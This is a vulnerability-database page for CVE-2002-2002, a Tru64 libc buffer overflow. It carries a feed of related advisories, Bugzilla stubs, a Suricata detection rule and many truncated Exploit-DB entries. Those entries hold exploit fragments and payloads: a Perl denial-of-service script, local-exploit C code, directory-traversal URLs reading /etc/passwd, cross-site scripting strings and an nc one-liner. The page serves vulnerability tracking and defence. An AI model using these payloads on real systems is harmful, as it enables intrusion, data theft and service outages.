CVE-2002-2002
published 2002-12-31CVE-2002-2002: Buffer overflow in libc in Compaq Tru64 4.0F, 5.0, 5.1 and 5.1A allows attackers to execute arbitrary code via long (1) LANG and (2) LOCPATH environment…
PriorityP422high7.5CVSS 2.0
AVNACLAuNCPIPAP
EPSS
2.68%
83.9th percentile
Buffer overflow in libc in Compaq Tru64 4.0F, 5.0, 5.1 and 5.1A allows attackers to execute arbitrary code via long (1) LANG and (2) LOCPATH environment variables.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| compaq | tru64 | — | — |
| compaq | tru64 | — | — |
| compaq | tru64 | — | — |
| compaq | tru64 | — | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat7.5HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2q29-9457-5vhh: Buffer overflow in libc in Compaq Tru64 4
ghsa_unreviewed·2022-04-30
CVE-2002-2002 [HIGH] GHSA-2q29-9457-5vhh: Buffer overflow in libc in Compaq Tru64 4
Buffer overflow in libc in Compaq Tru64 4.0F, 5.0, 5.1 and 5.1A allows attackers to execute arbitrary code via long (1) LANG and (2) LOCPATH environment variables.
Red Hat
security flaw
vendor_redhat·2002-10-14·CVSS 7.5
CVE-2002-0836 [HIGH] security flaw
security flaw
dvips converter for Postscript files in the tetex package calls the system() function insecurely, which allows remote attackers to execute arbitrary commands via certain print jobs, possibly involving fonts.
Cisco
Microsoft Windows SMB Denial of Service Vulnerabilities in Cisco Products - MS02-045
vendor_cisco·2002-09-18
CVE-2002-0724 CWE-119 Microsoft Windows SMB Denial of Service Vulnerabilities in Cisco Products - MS02-045
Microsoft Windows SMB Denial of Service Vulnerabilities in Cisco Products - MS02-045
This advisory describes vulnerabilities that affect Cisco products and
applications that are installed on Microsoft operating systems incorporating
the use of the Server Message Block (SMB) file sharing protocol. It is based on
the vulnerabilities in Microsoft's SMB protocol, not due to a defect of the
Cisco product or application.
Vulnerabilities were discovered that enable an attacker to perform a
denial of service against the server and may allow execution of arbitrary code.
These vulnerabilities were publicly announced by Microsoft in their Microsoft
Security Bulletin
MS02-045
.
All Cisco products and applications that are using the Microsoft
operating systems identified by Microsoft in their Micro
Red Hat
security flaw
vendor_redhat·2002-08-05·CVSS 7.5
CVE-2002-0660 [HIGH] security flaw
security flaw
Buffer overflow in libpng 1.0.12-3.woody.2 and libpng3 1.2.1-1.1.woody.2 on Debian GNU/Linux 3.0, and other operating systems, may allow attackers to cause a denial of service and possibly execute arbitrary code, a different vulnerability than CVE-2002-0728.
Red Hat
security flaw
vendor_redhat·2002-05-02·CVSS 4.6
CVE-2002-0164 [MEDIUM] security flaw
security flaw
Vulnerability in the MIT-SHM extension of the X server on Linux (XFree86) 4.2.1 and earlier allows local users to read and write arbitrary shared memory, possibly to cause a denial of service or gain privileges.
Red Hat
security flaw
vendor_redhat·2002-03-23·CVSS 5.0
CVE-2002-0353 [MEDIUM] security flaw
security flaw
The ASN.1 parser in Ethereal 0.9.2 and earlier allows remote attackers to cause a denial of service (crash) via a certain malformed packet, which causes Ethereal to allocate memory incorrectly, possibly due to zero-length fields.
Citrix
Citrix Security Bulletin CTX115245
vendor_citrix·CVSS 4.3
CVE-2002-2426 [MEDIUM] Citrix Security Bulletin CTX115245
Citrix Security Bulletin CTX115245
CVE References: CVE-2002-2426, CVE-2025-12101, CVE-2025-62626, CVE-2026-23554, CVE-2026-3055, CVE-2026-4368, CVE-2026-4397
Affected Products: Citrix ADM, Citrix Hypervisor, Citrix Virtual Apps and Desktops, Endpoint Management, NetScaler ADC, NetScaler Gateway, XenServer
Cisco
Heap Overflow in Solaris cachefs Daemon
vendor_cisco
CVE-2003-1063 Heap Overflow in Solaris cachefs Daemon
CVE-2003-1063: Heap Overflow in Solaris cachefs Daemon
This advisory describes a vulnerability that affects Cisco products and applications that are installed on the Solaris operating system, and is based on the vulnerability of an common service within the Solaris operating system, not due to a defect of the Cisco product or application. A vulnerability in the "cachefs" program was discovered that enables an attacker to execute arbitrary code under Solaris OS. This vulnerability was publicly announced in the CERT Advisory CA-2002-11. All Cisco products and applications that are installed on Solaris OS are considered vulnerable to the underlying operating system vulnerability, unless the workaround was applied. This vulnerability is described in
CWE: CWE-119, CWE-119
Cisco
Microsoft IIS Vulnerabilities in Cisco Products - MS02-018
vendor_cisco
CVE-2002-0149 Microsoft IIS Vulnerabilities in Cisco Products - MS02-018
CVE-2002-0149: Microsoft IIS Vulnerabilities in Cisco Products - MS02-018
This advisory describes a vulnerability that affects Cisco products and applications that are installed on Microsoft operating systems incorporating the use of the Internet Information Server (IIS), and is based on the vulnerability of IIS, not due to a defect of the Cisco product or application. A number of vulnerabilities were discovered that enables an attacker to execute arbitrary code or perform a denial of service against the server. These vulnerabilities were discovered and publicly announced by Microsoft in their Microsoft Security Bulletin MS02-018. This advisory is available at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20020415-ms02-018 .
Suricata
GPL FTP CWD overflow attempt
suricata·2010-09-23
CVE-1999-0219 GPL FTP CWD overflow attempt
GPL FTP CWD overflow attempt
Rule: alert ftp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL FTP CWD overflow attempt"; flow:established,to_server; content:"CWD"; nocase; isdataat:100,relative; pcre:"/^CWD\s[^\n]{100}/smi"; reference:bugtraq,11069; reference:bugtraq,1227; reference:bugtraq,1690; reference:bugtraq,6869; reference:bugtraq,7251; reference:bugtraq,7950; reference:cve,1999-0219; reference:cve,1999-1058; reference:cve,1999-1510; reference:cve,2000-1035; reference:cve,2000-1194; reference:cve,2001-0781; reference:cve,2002-0126; reference:cve,2002-0405; classtype:attempted-admin; sid:2101919; rev:25; metadata:created_at 2010_09_23, cve CVE_1999_0219, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Exploit-DB
FTPShell Client 5.24 - 'Create NewFolder' Local Buffer Overflow
exploitdb·2016-02-04
FTPShell Client 5.24 - 'Create NewFolder' Local Buffer Overflow
FTPShell Client 5.24 - 'Create NewFolder' Local Buffer Overflow
---
#[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
#[+] Exploit Title: FTPShell Client (Add New Folder) Local Buffer Overflow
#[+] Date: 2/2/2016
#[+]Exploit Author: Arash Khazaei
#[+] Vendor Homepage: www.ftpshell.com
#[+]Software Link: http://www.ftpshell.com/download.htm
#[+] Version: 5.24
#[+] Tested on: Windows XP Professional SP3 (Version 2002)
#[+] CVE : N/A
#[+] introduction : Add New Folder In Remote FTP Server And In Name Input Copy Buffer.txt File content
#[+] or click on Remote Tab Then Click On Create Folder And Copy Buffer.txt In Name Input ...
#[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
#!/usr/bin/python
filename = "buffer.txt"
# Junk A
junk = "A"*452
#
Exploit-DB
Microsoft Excel - HFPicture Record Parsing Remote Code Execution
exploitdb·2010-09-16·CVSS 9.3
CVE-2010-1248 [CRITICAL] Microsoft Excel - HFPicture Record Parsing Remote Code Execution
Microsoft Excel - HFPicture Record Parsing Remote Code Execution
---
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ < (day 16 binary anlysis)
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/
'''
Title : Microsoft Excel HFPicture Record Parsing Remote Code Execution Vulnerability
Version : Excel 2002 SP3
Analysis : http://www.abysssec.com
Vendor : http://www.microsoft.com
Impact : High
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
CVE : CVE-2010-1248
here is BA : http://www.exploit-db.com/maoub-16-microsoft-excel-hfpicture-record-parsing-remote-code-execution-vulnerability/
here is the PoC : https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploit
Exploit-DB
PuTTy.exe 0.53 - Validation Remote Buffer Overflow (Metasploit)
exploitdb·2006-05-15
CVE-2002-1359 PuTTy.exe 0.53 - Validation Remote Buffer Overflow (Metasploit)
PuTTy.exe 0.53 - Validation Remote Buffer Overflow (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::putty_ssh;
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use POSIX;
my $advanced =
{
};
my $info =
{
'Name' => 'PuTTy.exe '$Revision: 1.1 $',
'Authors' => [ 'y0 [at] w00t-shell.net' ],
'Description' =>
Pex::Text::Freeform(qq{
This module exploits a buffer overflow in the PuTTY SSH client that is triggered
throug
Exploit-DB
3Com SuperStack 3 NBX 4.0/4.1 - FTPD Denial of Service
exploitdb·2002-12-02
CVE-2002-2300 3Com SuperStack 3 NBX 4.0/4.1 - FTPD Denial of Service
3Com SuperStack 3 NBX 4.0/4.1 - FTPD Denial of Service
---
source: https://www.securityfocus.com/bid/6297/info
It has been reported that the ftpd server, included in the Embedded Real Time Operating System (ERTOS) of 3Com Superstack 3 NBX IP phones, contains a denial of service vulnerability. This issue can be triggered by sending a CEL paramater of excessive length, effectively causing the ftpd server and various VoIP services to no longer respond.
It should be noted that this issue may be similar to the vulnerability described in BID 679.
Although unconfirmed, it should also be noted that due to the nature of this vulnerability under some circumstances it may be exploited to execute arbitrary code.
CEL aaaa[...]aaaa where string is 2048 bytes long
Exploit-DB
IISPop 1.161/1.181 - Remote Buffer Overflow (Denial of Service) (PoC)
exploitdb·2002-11-14
CVE-2002-2404 IISPop 1.161/1.181 - Remote Buffer Overflow (Denial of Service) (PoC)
IISPop 1.161/1.181 - Remote Buffer Overflow (Denial of Service) (PoC)
---
source: https://www.securityfocus.com/bid/6183/info
IISPop is vulnerable to a denial of service caused by a buffer overflow. By sending an unusually large amount of data to IISPop on TCP port 110, the application will terminate with an access violation. Arbitrary code execution may be possible.
#!/usr/bin/perl -w
# tool : iispdos.pl
# shutdown all version of IISPop
# greetz crack.fr , marocit ,christal
#
use IO::Socket;
$ARGC=@ARGV;
if ($ARGC !=1) {
print "\n-->";
print "\tUsage: perl iispdos.pl \n";
exit;
}
$remo = $ARGV[0];
$buffer = "A" x 289999;
print "\n-->";
print "\tconnection with $remo\n";
unless ($so = IO::Socket::INET->new (Proto => "TCP",
PeerAddr => $remo,
PeerPort
=> "110"))
{
print "-->";
print
Exploit-DB
Microsoft Windows XP/2000/NT 4.0 - RPC Service Denial of Service (3)
exploitdb·2002-10-18
CVE-2002-1561 Microsoft Windows XP/2000/NT 4.0 - RPC Service Denial of Service (3)
Microsoft Windows XP/2000/NT 4.0 - RPC Service Denial of Service (3)
---
source: https://www.securityfocus.com/bid/6005/info
The Microsoft Windows RPC service contains a flaw that may allow a remote attacker to cause a denial of service. By sending a specifically malformed packet to TCP port 135, the RPC service will be disabled.
This vulnerability was originally reported to only affect Windows 2000. Microsoft has confirmed that Windows NT 4.0 and XP are also vulnerable.
It has been reported that installation of the provided patch will cause some problems in IIS environments. Specifically, users who are using COM+ in IIS environments may experience problems with ASP transactions.
A variant of this issue has been reported which allegedly affects patched systems. It is apparently possi
Exploit-DB
Microsoft Windows XP/2000/NT 4.0 - NetDDE Privilege Escalation (1)
exploitdb·2002-10-09
CVE-2002-1230 Microsoft Windows XP/2000/NT 4.0 - NetDDE Privilege Escalation (1)
Microsoft Windows XP/2000/NT 4.0 - NetDDE Privilege Escalation (1)
---
// source: https://www.securityfocus.com/bid/5927/info
The Winlogon NetDDE Agent can be leveraged to allow local privilege escalation. This is related to the Microsoft Windows Window Message Subsystem Design Error Vulnerability (BID 5408). A local user can use a WM_COPYDATA message to send arbitrary code to NetDDE, which will be executed with Local System privileges when a second WM_TIMER message is sent.
//
/////////// Copyright Serus 2002////////////////
//mailto:[email protected]
//
//This program check system on winlogon bug present
//Only for Windows 2000
//This is for check use only!
//
#include
#include
void main(int argc, char *argv[ ], char *envp[ ] )
{
char *buf;
DWORD Addr = 0;
BOOL bExec = TRUE;
uns
Exploit-DB
Jetty 3.1.6/3.1.7/4.1 Servlet Engine - Arbitrary Command Execution
exploitdb·2002-10-02
CVE-2002-1178 Jetty 3.1.6/3.1.7/4.1 Servlet Engine - Arbitrary Command Execution
Jetty 3.1.6/3.1.7/4.1 Servlet Engine - Arbitrary Command Execution
---
source: https://www.securityfocus.com/bid/5852/info
A flaw in the CGIServlet in Jetty allows an attacker to execute arbitrary commands on the server. Specifically, it is possible for an attacker to use directory traversal sequences and cause the CGIServlet to execute attacker-specified commands (such as running executables on the host).
This vulnerability affects Jetty versions for Microsoft Windows prior to 4.1.0.
http://jetty-server:8080/cgi-bin/..\..\..\..\..\..\winnt/notepad.exe
Exploit-DB
DB4Web 3.4/3.6 - Connection Proxy
exploitdb·2002-09-17
CVE-2002-1484 DB4Web 3.4/3.6 - Connection Proxy
DB4Web 3.4/3.6 - Connection Proxy
---
source: https://www.securityfocus.com/bid/5725/info
DB4Web is an application server that allows read and write access to relational databases and other information sources, via the web. The application is available for Windows, Linux, and various Unix platforms.
By requesting a specially crafted URL, it is possible to initiate a TCP connect from the vulnerable server to a remote IP address and arbitrary port.
The server will then produce a debug page, which can be used to determine port status on the scanned host.
http://127.0.0.1/DB4Web/172.31.93.30:22/foo
Exploit-DB
Netris 0.3/0.4/0.5 - Remote Memory Corruption
exploitdb·2002-09-09
CVE-2002-1566 Netris 0.3/0.4/0.5 - Remote Memory Corruption
Netris 0.3/0.4/0.5 - Remote Memory Corruption
---
// source: https://www.securityfocus.com/bid/5680/info
Netris is prone to a remotely exploitable memory corruption issue.
Netris is prone to a remotely exploitable memory corruption issue. An attacker may exploit this to execute arbitrary code with the privileges of the user invoking the vulnerable application.
/*[ netris[v0.5]: client/server remote buffer overflow exploit. ]*
* *
* by: vade79/v9 [email protected] (fakehalo/realhalo) *
* *
* netris homepage/URL: *
* http://www.netris.org *
* ftp://ftp.netris.org (v0.52 fixes this bug) *
* *
* compile: *
* cc xnetris.c -o xnetris *
* *
* this exploits the netris buffer overflow found roughly a year *
* ago(https://www.securityfocus.com/bid/5680), and recently *
* brought up again,
Exploit-DB
phpGB 1.1 - HTML Injection
exploitdb·2002-09-09
CVE-2002-1480 phpGB 1.1 - HTML Injection
phpGB 1.1 - HTML Injection
---
source: https://www.securityfocus.com/bid/5676/info
phpGB is subject to HTML injection attacks.
phpGB fails to check for the presence of HTML tags when generating guestbook entries. It is reported that an attacker may inject HTML and script code into guestbook entries, which will be executed in the web client of the administrative guestbook user when the admin attempts to delete the entry.
Enter the following guestbookentry:
"delete me alert(document.cookie)"
Exploit-DB
Microsoft Outlook Express 5/6 - MHTML URL Handler File Rendering
exploitdb·2002-08-15
CVE-2002-0980 Microsoft Outlook Express 5/6 - MHTML URL Handler File Rendering
Microsoft Outlook Express 5/6 - MHTML URL Handler File Rendering
---
source: https://www.securityfocus.com/bid/5473/info
Microsoft Outlook Express introduced a URL handler called MHTML (MIME Encapsulation of Aggregate HTML). This allows Internet Explorer to pass MHTML files to Outlook Express for rendering.
The MHTML URL handler does not validate the file type it is rendering. This could allow a file type that is normally considered to be a "safe file type", such as a .txt file, to be opened and have any script contained within rendered. This script would then be rendered in the Local Computer Zone.
malware.com
function malware(){
document.body.navigate("http://www.microsoft.com");alert("malware");
open("file://C%3A%5CWINDOWS%5CTemp%5Cwecerr.txt")
}
Exploit-DB
Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (2)
exploitdb·2002-08-06
CVE-2002-1230 Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (2)
Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (2)
---
// source: https://www.securityfocus.com/bid/5408/info
A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely affects almost every Win32 window-based application. Attackers with local access may exploit this vulnerability to elevate privileges if a window belonging to another process with higher privileges is present. One example of such a process is antivirus software, which often must run with LocalSystem privileges.
** Microsoft has released a statement regarding this issue. Please see the References section for details.
A paper, entitled "Win32 Message Vulnerabilities Redux" has been publ
Exploit-DB
Microsoft Internet Explorer 5/6 / Konqueror 2.2.2/3.0 / Weblogic Server 5/6/7 - Invalid X.509 Certificate Chain
exploitdb·2002-08-06
CVE-2002-1183 Microsoft Internet Explorer 5/6 / Konqueror 2.2.2/3.0 / Weblogic Server 5/6/7 - Invalid X.509 Certificate Chain
Microsoft Internet Explorer 5/6 / Konqueror 2.2.2/3.0 / Weblogic Server 5/6/7 - Invalid X.509 Certificate Chain
---
source: https://www.securityfocus.com/bid/5410/info
A flaw has been reported in the handling of X.509 certificates by a number of products, including several web browsers. It may be possible for a malicious party to create certificates for arbitrary domains, which will be treated as trusted by the vulnerable browser.
The flaw lies in the handling of intermediate certificate authorities. Normally, intermediate certificates should possess a Basic Constraints field which states the certificate may be used as a signing authority.
Vulnerable products do not require the Basic Constraints field be properly defined. A malicious party with one valid certificate may sign a new cer
Exploit-DB
CodeBlue 5.1 - SMTP Response Buffer Overflow
exploitdb·2002-07-24
CVE-2002-0280 CodeBlue 5.1 - SMTP Response Buffer Overflow
CodeBlue 5.1 - SMTP Response Buffer Overflow
---
// source: https://www.securityfocus.com/bid/5300/info
CodeBlue is an Apache httpd log scanning utility that attempts to contact the administrators of hosts infected with worms.
A buffer overflow vulnerability has been reported in CodeBlue. The condition occurs when processing responses from SMTP servers. It may be possible for malicious SMTP servers to execute shellcode on hosts running CodeBlue.
/*
* hi, this is an exploit that doesnt work. it should be enough of a point in
* the right direction though. the overflow is in get_smtp_reply(), codeblue.c
* is pretty damn poor, there are more!!!
*
*
* To use this against a webserver (A) using codeblue.
*
* $ printf "GET /scripts/root.exe\r\n\r\n" | nc A 80
*
* this will add an entry in the
Exploit-DB
Mandrake 7/8/9 / RedHat 6.x/7 Bonobo EFSTool - Commandline Argument Buffer Overflow (3)
exploitdb·2002-06-29
CVE-2002-1814 Mandrake 7/8/9 / RedHat 6.x/7 Bonobo EFSTool - Commandline Argument Buffer Overflow (3)
Mandrake 7/8/9 / RedHat 6.x/7 Bonobo EFSTool - Commandline Argument Buffer Overflow (3)
---
// source: https://www.securityfocus.com/bid/5125/info
Bonobo is a set of tools and CORBA interfaces included as part of the Gnome infrastructure. It is designed for use on the Linux and Unix operating systems.
A boundry condition error has been discovered in the efstool program. Due to improper bounds checking, it is possible for a user to supply a long commandline argument to the efstool program, which would result in a buffer overflow. This problem could be exploited on the local system to overwrite stack memory, including the return address, and execute attacker supplied code.
/*
Author: N4rK07IX
[email protected] || [email protected] (i think this is useless pop3 box,never checked, in
Exploit-DB
OpenSSH 3.x - Challenge-Response Buffer Overflow (2)
exploitdb·2002-06-24
CVE-2002-0640 OpenSSH 3.x - Challenge-Response Buffer Overflow (2)
OpenSSH 3.x - Challenge-Response Buffer Overflow (2)
---
source: https://www.securityfocus.com/bid/5093/info
The OpenSSH team has reported two vulnerabilities in OpenSSH that are remotely exploitable and may allow for unauthenticated attackers to obtain root privileges.
The conditions are related to the OpenSSH SSH2 challenge-response mechanism. They occur when the OpenSSH server is configured at compile time to support BSD_AUTH or SKEY. OpenBSD 3.0 and later ship with OpenSSH built to support BSD_AUTH. Systems are vulnerable when either of the following configuration options are enabled:
PAMAuthenticationViaKbdInt
ChallengeResponseAuthentication
Attackers can exploit the vulnerabilities by crafting a malicious response. Since this occurs before the authentication process completes,
Exploit-DB
Sendmail 8.9.x/8.10.x/8.11.x/8.12.x - File Locking Denial of Service (2)
exploitdb·2002-05-24
CVE-2002-1827 Sendmail 8.9.x/8.10.x/8.11.x/8.12.x - File Locking Denial of Service (2)
Sendmail 8.9.x/8.10.x/8.11.x/8.12.x - File Locking Denial of Service (2)
---
// source: https://www.securityfocus.com/bid/4822/info
Sendmail is a MTA for Unix and Linux variants.
There is a vulnerability in Sendmail that will lead to a denial of service condition. The vulnerability occurs when a malicious user acquires an exclusive lock on files that Sendmail requires for operation.
#include
#include
/*
Stupid piece of code to test the sendmail lock vulnerability on
FreeBSD. Run this and try sendmail -t on FreeBSD for example.
More info: http://www.sendmail.org/LockingAdvisory.txt
zillion (at safemode.org && snosoft.com)
http://www.safemode.org
http://www.snosoft.com
*/
int main() {
if(fork() == 0) {
char *lock1 = "/etc/mail/aliases";
char *lock2 = "/etc/mail/aliases.db";
char
Exploit-DB
GNU Mailman 2.0.x - Admin Login Cross-Site Scripting
exploitdb·2002-05-20
CVE-2002-0388 GNU Mailman 2.0.x - Admin Login Cross-Site Scripting
GNU Mailman 2.0.x - Admin Login Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/4825/info
GNU Mailman is prone to a cross-site scripting vulnerability. An attacker may construct a malicious link to the administrative login page, which contains arbitrary HTML and script code.
A user visiting the link will have the attacker's script code executed in their web browser in the context of the site running the vulnerable software.
http://target/mailman_directory/admin/ml-name?adminpw="><br
Exploit-DB
Jon Howell Faq-O-Matic 2.7 - Cross-Site Scripting
exploitdb·2002-04-20
CVE-2002-2011 Jon Howell Faq-O-Matic 2.7 - Cross-Site Scripting
Jon Howell Faq-O-Matic 2.7 - Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/4565/info
Faq-O-Matic 2.711 and 2.712 is a web-based Frequently Asked Question (FAQ) management system. It is vulnerable to a cross site scripting issue arising from a failure to filter HTML or script from a malformed query, returning the submitted script as an error message which is then processed by the browser. This is done by submitting the script as an argument to the Faq-O-Matic component "fom.cgi" - specifically, to the "file" parameter. This script is then treated by the user's browser as though it originated from the Faq-O-Matic web site.
http://www.wherever.tld/path_to_Faq-O-Matic/fom?file=alert('If+this+script+was+modified,+it+could+easily+steal+amigadev.net+cookies+and+log+them+t
Exploit-DB
OpenBSD 2.9/3.0 - Default Crontab Root Command Injection
exploitdb·2002-04-11
CVE-2002-0542 OpenBSD 2.9/3.0 - Default Crontab Root Command Injection
OpenBSD 2.9/3.0 - Default Crontab Root Command Injection
---
/*
source: https://www.securityfocus.com/bid/4495/info
OpenBSD ships with a number of cron jobs configured by default. The tasks are for the purpose of summarizing system information.
The mail(1) utility is used to send the summaries to the root user. This utility supports escaped characters in message text indicating commands to be executed during processing.
If attacker-supplied data can be included in the message text passed to mail(1), commands specified by the attacker may be executed as root. If the attacker embeds the escape sequence followed by an arbitrary command in this data, the commands will be executed as root when the cron task runs. It is possible for an attacker to embed data in filenames, which are included
Exploit-DB
Trend Micro Interscan VirusWall 3.5/3.6 - Content-Length Scan Bypass
exploitdb·2002-03-11
CVE-2002-0440 Trend Micro Interscan VirusWall 3.5/3.6 - Content-Length Scan Bypass
Trend Micro Interscan VirusWall 3.5/3.6 - Content-Length Scan Bypass
---
// source: https://www.securityfocus.com/bid/4265/info
Trend Micro InterScan VirusWall is a high performance internet gateway virus scanning package. It is capable of scanning incoming content over HTTP, SMTP and FTP for viruses and malicious code.
A vulnerability has been reported in some versions of VirusWall. An option exists called "Skip scanning if Content-length equals 0", which is enabled by default. A malicious web server may return infected content with this header set to 0, and bypass the VirusWall scanner. As many popular client programs will ignore this header and display the content, this may allow malicious content to bypass VirusWall and still be interpreted by a client system.
Other versions of Vi
Exploit-DB
Hanterm 3.3 - Local Buffer Overflow (2)
exploitdb·2002-02-07
CVE-2002-0239 Hanterm 3.3 - Local Buffer Overflow (2)
Hanterm 3.3 - Local Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/4050/info
Hanterm is a replacement for xterm which includes Hangul support, used for Korean language systems.
A buffer overflow error exists in hanterm. If it is called locally with a maliciously constructed parameter, it is possible to overflow a buffer. This can result in the return address of a stack frame being overwritten, and lead to the execution of arbitrary code.
As hanterm runs suid root on some systems, exploitation of this vulnerability may result in a local root compromise.
/* hanterm_exp.c
*
* local exploit for hanterm
* .. tested in TurboLinux Server 6.5 (Japan)
*
* thanks my Japanese friend kaju(kaijyu)
* and Japanese hacker UNYUN.
*
* by [email protected]
* 2002/02/07
*/
#includ
Exploit-DB
Portix-PHP 0.4 - 'index.php' Directory Traversal
exploitdb·2002-02-04
CVE-2002-2084 Portix-PHP 0.4 - 'index.php' Directory Traversal
Portix-PHP 0.4 - 'index.php' Directory Traversal
---
source: https://www.securityfocus.com/bid/4038/info
Portix-PHP is freely available web portal software. It is written in PHP and will run on most Unix and Linux variants.
Portix-PHP is prone to directory traversal attacks. The script index.php does not sufficiently filter '../' sequences from web requests, making it possible for an attacker to browse the filesystem of the host running the vulnerable software. Arbitrary web-readable files may be viewed by an attacker.
Successful exploitation may cause sensitive information to be disclosed to the attacker. Information gathered in this manner may be used to aid in further attacks against the host.
www.hostportix.com/index.php?l=../../../etc/passwd
Bugzilla
CVE-2002-1170 security flaw
bugzilla·2018-08-16·CVSS 5.0
CVE-2002-1170 [MEDIUM] CVE-2002-1170 security flaw
CVE-2002-1170 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
The handle_var_requests function in snmp_agent.c for the SNMP daemon in the Net-SNMP (formerly ucd-snmp) package 5.0.1 through 5.0.5 allows remote attackers to cause a denial of service (crash) via a NULL dereference.
Bugzilla
CVE-2002-0659 security flaw
bugzilla·2018-08-16·CVSS 5.0
CVE-2002-0659 [MEDIUM] CVE-2002-0659 security flaw
CVE-2002-0659 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
The ASN1 library in OpenSSL 0.9.6d and earlier, and 0.9.7-beta2 and earlier, allows remote attackers to cause a denial of service via invalid encodings.
Bugzilla
CVE-2002-0704 security flaw
bugzilla·2018-08-16·CVSS 7.5
CVE-2002-0704 [HIGH] CVE-2002-0704 security flaw
CVE-2002-0704 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
The Network Address Translation (NAT) capability for Netfilter ("iptables") 1.2.6a and earlier leaks translated IP addresses in ICMP error messages.
Bugzilla
CVE-2002-1223 security flaw
bugzilla·2018-08-16·CVSS 7.5
CVE-2002-1223 [HIGH] CVE-2002-1223 security flaw
CVE-2002-1223 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Buffer overflow in DSC 3.0 parser from GSview, as used in KGhostView in KDE 1.1 and KDE 3.0.3a, may allow attackers to cause a denial of service or execute arbitrary code via a modified .ps (PostScript) input file.
Bugzilla
CVE-2002-0825 security flaw
bugzilla·2018-08-16·CVSS 7.5
CVE-2002-0825 [HIGH] CVE-2002-0825 security flaw
CVE-2002-0825 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Buffer overflow in the DNS SRV code for nss_ldap before nss_ldap-198 allows remote attackers to cause a denial of service and possibly execute arbitrary code.
Bugzilla
CVE-2002-1397 security flaw
bugzilla·2018-08-16·CVSS 7.5
CVE-2002-1397 [HIGH] CVE-2002-1397 security flaw
CVE-2002-1397 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Vulnerability in the cash_words() function for PostgreSQL 7.2 and earlier allows local users to cause a denial of service and possibly execute arbitrary code via a large negative argument, possibly triggering an integer signedness error or buffer overflow.
Bugzilla
CVE-2002-0162 security flaw
bugzilla·2018-08-16·CVSS 6.2
CVE-2002-0162 [MEDIUM] CVE-2002-0162 security flaw
CVE-2002-0162 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
LogWatch before 2.5 allows local users to execute arbitrary code via a symlink attack on the logwatch temporary directory.
http://cert.uni-stuttgart.de/archive/bugtraq/2002/04/msg00219.htmlhttp://ftp.support.compaq.com/patches/.new/html/SSRT-541.shtmlhttp://www.iss.net/security_center/static/8863.phphttp://www.lac.co.jp/security/english/snsadv_e/51_e.htmlhttp://www.securityfocus.com/bid/4544http://cert.uni-stuttgart.de/archive/bugtraq/2002/04/msg00219.htmlhttp://ftp.support.compaq.com/patches/.new/html/SSRT-541.shtmlhttp://www.iss.net/security_center/static/8863.phphttp://www.lac.co.jp/security/english/snsadv_e/51_e.htmlhttp://www.securityfocus.com/bid/4544
2002-12-31
Published